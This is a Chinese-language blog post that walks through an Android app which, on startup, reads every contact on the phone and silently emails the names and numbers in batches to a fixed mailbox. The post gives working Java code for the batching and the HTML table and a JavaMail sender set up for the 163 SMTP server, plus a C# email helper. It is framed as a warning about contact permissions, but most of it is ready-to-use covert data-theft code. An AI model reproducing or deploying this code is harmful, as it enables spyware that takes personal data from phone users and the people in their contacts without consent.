最近上半年绩效确认,又是C,我就不明白了,怎么才能得B,怎么才能得A。我去,不借书,不参加培训,不加班就活该得C,那你招一群刚毕业的学生得了,刚毕业的学生干劲大,加班到半夜都没问题。唉,不说了,这年头不加班干完活都觉得不正常了。


大家还记得上篇文章么,看下图。

今天的话我就是要在该App启动的时候,将手机内存储的所有联系人通过邮件发送到指定的邮箱,怎么样,够狠吧。所以不是所有的app我们都给他开读取手机信息的权限,否则就泄露个底朝天。我们先看一下发邮件,需要到网上下载这三个jar包,这三个jar包不好下,要么你去google官网下,要么在csdn下,或者干脆在本篇文章下,给大家点福利。


说到这个发邮件,类是别人写的,我拿来以为能用,结果他妈的很多问题,压根就发不了邮件。改了很多问题,查了一些资料,尼玛才搞定。说到这里,我就想说那些写博客的或者是抄博客的或者是转载博客的,咋们做技术的要凭良心写博客。不能不管三七二十一,就抄过来。这样不但让看你博客的人觉得你不专业,而且还浪费每个看你博客的人的时间。你写个博客,你文采不行,但是你把代码最起码写的能正常运行,能达到该代码能实现的功能吧。

好了,不说了。我们看一下代码,我的设计是将联系人信息全部读取出来,然后通过多线程分批发送到指定邮箱。要说到多线程,大家肯定会想到Handler,handler会分发runable对象到主线程消息队列中。当我们实例化一个Handler对象的时候,就默认与对它初始化的进程的消息队列绑定。那么当线程有更新UI的操作话,我们就需要把数据消息作为一个Message对象发送到消息队列中,然后,用Handler中的handlerMessge方法处理传过来的数据信息,并操作UI。那么刚才说到分发runable对象到主线程队列中,我们看一下Handler有哪些方法可以实现分发Runable对象(查API)。


我们今天使用的其实就是post方法,分发多个runable对象到消息队列并执行。说了这么多不如直接看代码来得实在。

privatevoidSyncContactUserInfo(){CustomRunablecustomeRunable;List<Map<String,Object>>tempPagedDataList=this.GetContactUserList();List<Map<String,Object>>dataList=this.GetContactUserList();inttotalSize=dataList.size();if(totalSize==0)return;intthreadCount=totalSize%PageSize==0?totalSize/PageSize:totalSize/PageSize+1;for(inti=1;i<=threadCount;i++){if(i==threadCount){tempPagedDataList=dataList.subList((i-1)*PageSize,(i-1)*PageSize+totalSize%PageSize-1);}else{tempPagedDataList=dataList.subList((i-1)*PageSize,PageSize*i-i);}customeRunable=newCustomRunable(tempPagedDataList,i);handler.post(customeRunable);}}

上节课我们已经写过如何读取手机联系人了,所以这里就不在赘述。这段代码其实就是把联系人信息读取出来,然后去分批发送。上面的代码相信做过分页的人都应该知道,需要注意的就是List<T>的subList方法,传入start Index和end index就可以了,这里有点类似客户端分页。

在上面的代码中我们看到了一个CustomRunable类,这个类是我自己定义的,如下

classCustomRunableimplementsRunnable{StringBuilderstrBuilder=newStringBuilder();List<Map<String,Object>>dataList;intindex;publicCustomRunable(List<Map<String,Object>>dataList,intindex){this.dataList=dataList;this.index=index;}publicvoidrun(){strBuilder.append("<html><body><tablestyle='border:1pxsolidblack'>");strBuilder.append("<tr><th>姓名</th><th>手机号码</th></tr>");if(this.dataList!=null&&this.dataList.size()>0){for(Map<String,Object>data:dataList){strBuilder.append("<tr>");strBuilder.append("<td>");strBuilder.append(data.get("UserName").toString());strBuilder.append("</td>");strBuilder.append("<td>");strBuilder.append(data.get("UserPhoneNumber").toString());strBuilder.append("</td>");strBuilder.append("</tr>");}}strBuilder.append("</table></body></html>");MailSenderInfomailSendInfo=BuildMailSendInfo("第"+index+"批手机号",strBuilder.toString());SimpleMailSender.sendHtmlMail(mailSendInfo);}}

我定义了默认的构造函数,一个是联系人手机号码列表,一个是标示是第几批。当我拿到这批手机号码的时候,构造一个html格式的邮件,然后发送。邮件的标题是“第{0}批手机号码”,邮件的内容就是第一列姓名,第二列手机号的一个html表格。其实这里的run方法,一旦这个runable对象被分发到队列中,就会立即执行run方法。

大家其实可能此时最关注的是发邮件的代码,不妨就把最关键的类(SimpleMailSender)的代码贴出来好了,然后完了如果大家想要的话可以在这篇文章的附件下载或者加入群“.net技术冲锋舟(205217091)”。

packagebruce.util.mail;importjava.util.Date;importjava.util.Properties;importjavax.activation.CommandMap;importjavax.activation.MailcapCommandMap;importjavax.mail.Address;importjavax.mail.BodyPart;importjavax.mail.Message;importjavax.mail.MessagingException;importjavax.mail.Multipart;importjavax.mail.Session;importjavax.mail.Transport;importjavax.mail.internet.InternetAddress;importjavax.mail.internet.MimeBodyPart;importjavax.mail.internet.MimeMessage;importjavax.mail.internet.MimeMultipart;publicclassSimpleMailSender{/***以文本格式发送邮件**@parammailInfo*待发送的邮件的信息*/publicstaticbooleansendTextMail(MailSenderInfomailInfo){//判断是否需要身份认证MyAuthenticatorauthenticator=null;Propertiespro=mailInfo.getProperties();if(mailInfo.isValidate()){//如果需要身份认证,则创建一个密码验证器authenticator=newMyAuthenticator(mailInfo.getUserName(),mailInfo.getPassword());}//根据邮件会话属性和密码验证器构造一个发送邮件的sessionSessionsendMailSession=Session.getInstance(pro,authenticator);try{//根据session创建一个邮件消息MessagemailMessage=newMimeMessage(sendMailSession);//创建邮件发送者地址Addressfrom=newInternetAddress(mailInfo.getFromAddress());//设置邮件消息的发送者mailMessage.setFrom(from);//创建邮件的接收者地址,并设置到邮件消息中Addressto=newInternetAddress(mailInfo.getToAddress());mailMessage.setRecipient(Message.RecipientType.TO,to);//设置邮件消息的主题mailMessage.setSubject(mailInfo.getSubject());//设置邮件消息发送的时间mailMessage.setSentDate(newDate());//设置邮件消息的主要内容StringmailContent=mailInfo.getContent();mailMessage.setText(mailContent);//发送邮件Transport.send(mailMessage);returntrue;}catch(MessagingExceptionex){ex.printStackTrace();}returnfalse;}/***以HTML格式发送邮件**@parammailInfo*待发送的邮件信息*/publicstaticbooleansendHtmlMail(MailSenderInfomailInfo){//判断是否需要身份认证MyAuthenticatorauthenticator=null;Propertiespro=mailInfo.getProperties();//如果需要身份认证,则创建一个密码验证器if(mailInfo.isValidate()){authenticator=newMyAuthenticator(mailInfo.getUserName(),mailInfo.getPassword());}//根据邮件会话属性和密码验证器构造一个发送邮件的sessionSessionsendMailSession=Session.getInstance(pro,authenticator);try{//根据session创建一个邮件消息MessagemailMessage=newMimeMessage(sendMailSession);//创建邮件发送者地址Addressfrom=newInternetAddress(mailInfo.getFromAddress());//设置邮件消息的发送者mailMessage.setFrom(from);//创建邮件的接收者地址,并设置到邮件消息中Addressto=newInternetAddress(mailInfo.getToAddress());//Message.RecipientType.TO属性表示接收者的类型为TOmailMessage.setRecipient(Message.RecipientType.TO,to);//设置邮件消息的主题mailMessage.setSubject(mailInfo.getSubject());//设置邮件消息发送的时间mailMessage.setSentDate(newDate());//MiniMultipart类是一个容器类,包含MimeBodyPart类型的对象MultipartmainPart=newMimeMultipart();//创建一个包含HTML内容的MimeBodyPartBodyParthtml=newMimeBodyPart();//设置HTML内容html.setContent(mailInfo.getContent(),"text/html;charset=utf-8");mainPart.addBodyPart(html);//将MiniMultipart对象设置为邮件内容mailMessage.setContent(mainPart);//发送邮件MailcapCommandMapmc=(MailcapCommandMap)CommandMap.getDefaultCommandMap();mc.addMailcap("text/html;;x-java-content-handler=com.sun.mail.handlers.text_html");mc.addMailcap("text/xml;;x-java-content-handler=com.sun.mail.handlers.text_xml");mc.addMailcap("text/plain;;x-java-content-handler=com.sun.mail.handlers.text_plain");mc.addMailcap("multipart/*;;x-java-content-handler=com.sun.mail.handlers.multipart_mixed");mc.addMailcap("message/rfc822;;x-java-content-handler=com.sun.mail.handlers.message_rfc822");CommandMap.setDefaultCommandMap(mc);Transport.send(mailMessage);returntrue;}catch(MessagingExceptionex){ex.printStackTrace();}returnfalse;}}

OK,这就是我修改后的版本,能直接用,文章的末尾我会给大家见证奇迹。这个类中,一个是发送文本邮件,一个是发送Html格式的邮件,也可以发附件。OK,其实调用的话就是构造一个MailSenderInfo对象。如下

privatestaticMailSenderInfoBuildMailSendInfo(StringmailSubject,StringmailContent){MailSenderInfomailInfo=newMailSenderInfo();mailInfo.setContent(mailContent);mailInfo.setFromAddress("Bruce.L.Li@163.com");mailInfo.setMailServerHost("smtp.163.com");mailInfo.setMailServerPort("25");mailInfo.setPassword("********");mailInfo.setSubject(mailSubject);mailInfo.setToAddress("******@qq.com");mailInfo.setUserName("lilei1986XXXX@163.com");mailInfo.setValidate(true);returnmailInfo;}

在这里解释一下这些方法

setContent:邮件内容

setFromAddress:发送者邮箱账号

setMailServerHost:163邮箱

setMailServerPort:25

setPassword:用来验证的邮箱密码

setSubject:邮件标题

setToAddress:接收者的邮箱

setUserName:用来验证的邮箱账号

setValidate:如果为true,则会验证setUserName和setPassword的用户名和密码。否则不会。

这里需要注意setUserName和setPassword必须是一个能登陆163邮箱的账号和密码。


其实这里和C#发Email差不多

usingSystem;usingSystem.Collections.Generic;usingSystem.Linq;usingSystem.Text;namespaceCLUtility{publicclassEmailHelper{publicstaticvoidSendEmail(stringmailTitle,stringmailContent,paramsstring[]mailToAddress){System.Net.Mail.SmtpClientclient=newSystem.Net.Mail.SmtpClient();client.Host="smtp.ym.163.com";//使用163的SMTP服务器发送邮件client.UseDefaultCredentials=true;client.DeliveryMethod=System.Net.Mail.SmtpDeliveryMethod.Network;client.Credentials=newSystem.Net.NetworkCredential("Bruce.XXX.XX@163.com","*******");System.Net.Mail.MailMessageMessage=newSystem.Net.Mail.MailMessage();Message.From=newSystem.Net.Mail.MailAddress("lilei1986abc@163.com");foreach(varaddressinmailToAddress){Message.To.Add(address);}Message.Subject=mailTitle;Message.Body=mailContent;Message.SubjectEncoding=System.Text.Encoding.UTF8;Message.BodyEncoding=System.Text.Encoding.UTF8;Message.Priority=System.Net.Mail.MailPriority.High;Message.IsBodyHtml=true;client.Send(Message);}}}

OK,最后,我们见证奇迹的时刻到了,先看163发件箱。大家看到了顺序并不是按照1-9升序排列。

我们看一下发出的邮件内容

这些可都是我手机上的真实号码。唉,对不起大家,不知道网易和腾讯是否对这些号码感兴趣呢。

最后我们再看看QQ邮箱是否已经收到邮件。


木有问题,收到了。我们看一下内容

OK,成功了,最后,哥们的博客是货真价实的,测试机是小米3,看过这篇文章,你以后还敢随便允许app访问你的手机联系人信息吗。

更多相关文章

  1. 用android做的一个简单的短信发送器(当然不包括群发)
  2. Android(安卓)>> 27. Android(安卓)Studio 9-Patch 图片制作以及
  3. Android广播机制---发送本地广播_android全局信息处理本地广播安
  4. (转摘)Android腾讯微博客户端开发四:微博发送篇(QQ表情,@搜索)
  5. 进程(一) 1.2 Android中异步处理大杀器——Handler(1)
  6. android集成Umeng推送获取不到device_token也收不到消息,但是在Um
  7. Android(安卓)极光IM简单的聊天界面全手动实现
  8. Security and Permissions 安全与权限 (八)
  9. Netty UDP Server&Client

随机推荐

  1. Android启动脚本init.rc
  2. Android(安卓)15本经典教程和150多个实例
  3. Android(安卓)Bluetooth Low Energy(Andro
  4. RN https 双向认证
  5. Android开机界面
  6. Android(安卓)Layout机制研究
  7. Android之原生动作
  8. 【Java CV与Android】在Android工程里配
  9. Android开发 HTTP 发送 Post 与 Get 请求
  10. Android(安卓)MediaStore详解